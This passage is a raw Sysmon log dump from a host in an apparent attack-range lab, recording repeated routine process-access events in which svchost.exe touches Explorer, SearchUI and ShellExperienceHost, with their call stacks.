21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917097Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917096Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917095Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917094Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917093Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917092Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917091Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917090Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917089Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917088Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917087Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917086Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917085Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917084Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917083Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917082Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917081Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917080Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917079Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917078Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.481{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917077Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.480{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917076Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.480{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917075Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.480{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917074Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.480{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917073Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.480{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917072Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.480{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917071Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.480{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917070Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.480{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917069Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.480{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917068Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.480{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917067Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.480{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917066Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 